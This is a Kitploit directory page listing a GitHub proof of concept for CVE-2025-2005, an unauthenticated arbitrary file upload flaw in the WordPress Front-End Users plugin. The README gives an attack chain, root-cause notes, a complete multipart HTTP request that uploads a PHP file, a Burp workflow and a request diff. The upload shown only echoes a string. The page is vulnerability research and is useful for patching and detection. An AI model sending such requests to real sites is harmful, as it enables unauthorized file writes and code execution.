Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2005 — Proof-of-concept exploit for CVE-2025-2005, an arbitrary file upload vulnerability in the WordPress Front-End Users Plugin (<=3.2.32). Includes manual HTTP and Python exploit scripts for uploading PHP web shells to unauthenticated registration forms. | Kitploit
أدوات/GitHubGitHub/h4ckxel/cve-2025-2005
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubh4ckxel/cve-2025-2005

CVE-2025-2005

Proof-of-concept exploit for CVE-2025-2005, an arbitrary file upload vulnerability in the WordPress Front-End Users Plugin (<=3.2.32). Includes manual HTTP and Python exploit scripts for uploading PHP web shells to unauthenticated registration forms.

عرض المستودع
19منذ 5 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
المحتوى غير متوفر باللغة المطلوبة. عرض النسخة الإنجليزية.

CVE-2025-2005 — Front-End Users Arbitrary File Upload

CVE-2025-2005

WordPress Front-End Users — Unauthenticated Arbitrary File Upload

0xZ3R0 // h4ckxel

CVE WordPress Status Research


0x00 — Executive Summary

Front-End Users is affected by an unauthenticated arbitrary file upload vulnerability affecting versions ≤ 3.2.32.

The vulnerable registration workflow exposes an upload primitive that can be reached without requiring a privileged WordPress account.

The underlying issue is insufficient validation of attacker-controlled upload metadata and content before the file is persisted to the filesystem.

Attack chain

                  UNAUTHENTICATED ATTACKER
                           │
                           ▼
                 Public registration form
                           │
                           ▼
                  multipart/form-data
                           │
                           ▼
                Front-End Users handler
                           │
                           ▼
                Insufficient validation
                           │
                           ▼
                Attacker-controlled file
                           │
                           ▼
        /wp-content/uploads/ewd_feup_uploads/
                           │
                           ▼
              Web-accessible resource
                           │
                           ▼
             PHP execution if permitted
                           │
                           ▼
                         RCE

The final impact depends on the target's web-server and PHP configuration.


0x01 — Vulnerability Metadata

PropertyValue
CVECVE-2025-2005
ProductFront-End Users
Affected versions≤ 3.2.32
CWECWE-434
ClassUnrestricted Upload of File with Dangerous Type
Attack vectorNetwork
AuthenticationNone
Privileges requiredNone
User interactionNone
Primary primitiveArbitrary file upload
Potential impactRemote Code Execution
Researcherh4ckxel
Namespace0xZ3R0

0x02 — Vulnerability Classification

CWE-434

Unrestricted Upload of File with Dangerous Type

The vulnerable behavior can be reduced to:

Untrusted Input
      │
      ├── filename
      ├── extension
      ├── MIME type
      └── file content
             │
             ▼
       upload handler
             │
             ▼
        filesystem

The security boundary fails because attacker-controlled data reaches a persistent filesystem location without sufficient validation.


0x03 — Attack Surface

The vulnerable functionality is associated with the plugin's front-end registration system.

A typical registration request contains:

ewd-feup-action=register
Username=<value>
User_Password=<value>

and may contain an additional multipart file field:

Content-Disposition: form-data;
name="xxploit";
filename="poc.php"

Content-Type: application/x-php

The interesting part isn't the registration itself.

The interesting part is that the request crosses the following trust boundary:

                 INTERNET
                    │
                    ▼
          attacker-controlled HTTP
                    │
                    ▼
          registration endpoint
                    │
                    ▼
             upload handler
                    │
                    ▼
              filesystem

0x04 — Root Cause

The vulnerability originates from inadequate server-side validation of uploaded files.

A secure implementation should establish multiple independent controls:

                   UPLOAD
                     │
        ┌────────────┴────────────┐
        ▼                         ▼
 Authentication              Authorization
        │                         │
        └────────────┬────────────┘
                     ▼
             Extension allowlist
                     │
                     ▼
              MIME verification
                     │
                     ▼
              Content validation
                     │
                     ▼
            Server-side filename
                     │
                     ▼
          Non-executable storage

Any one of these controls being absent does not necessarily create RCE.

The problem becomes substantially more severe when multiple layers fail simultaneously.


0x05 — Controlled PoC

The following PoC demonstrates the file-write primitive without deploying a command shell.

HTTP request

POST /wordpress/2025/04/02/test/ HTTP/1.1
Host: 192.168.100.74:888
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=----0xZ3R0Boundary

------0xZ3R0Boundary
Content-Disposition: form-data; name="ewd-feup-check"

14bacb882cb211e10b2b3e07bfe096ef12a092dc
------0xZ3R0Boundary
Content-Disposition: form-data; name="ewd-feup-time"

1743554029
------0xZ3R0Boundary
Content-Disposition: form-data; name="ewd-feup-action"

register
------0xZ3R0Boundary
Content-Disposition: form-data; name="Username"

poc-user
------0xZ3R0Boundary
Content-Disposition: form-data; name="xxploit"; filename="poc.php"
Content-Type: application/x-php

<?php echo "CVE-2025-2005"; ?>

------0xZ3R0Boundary--

Expected filesystem result

wp-content/
└── uploads/
    └── ewd_feup_uploads/
        └── <randomized-name>.php

The important observation is:

attacker-controlled extension
            +
attacker-controlled content
            +
persistent filesystem write

0x06 — Burp Suite Workflow

A practical workflow for a lab environment:

[1] Open registration page
        │
        ▼
[2] Submit legitimate registration
        │
        ▼
[3] Intercept request with Burp
        │
        ▼
[4] Locate multipart file parameter
        │
        ▼
[5] Replace benign file with PoC file
        │
        ▼
[6] Forward request
        │
        ▼
[7] Inspect response
        │
        ▼
[8] Verify filesystem artifact
        │
        ▼
[9] Test whether uploads are executable

The security-critical observation should be made before attempting any post-exploitation.


0x07 — Request Diff

Legitimate request

Content-Disposition: form-data;
name="avatar";
filename="avatar.jpg"

<image-data>

Modified request

Content-Disposition: form-data;
name="xxploit";
filename="poc.php"

<?php echo "CVE-2025-2005"; ?>

Conceptually:

- filename="avatar.jpg"
+ filename="poc.php"

- <image-data>
+ <?php echo "CVE-2025-2005"; ?>

This illustrates the core primitive without relying on a weaponized payload.


0x08 — Safe Verification

تنزيل الأداة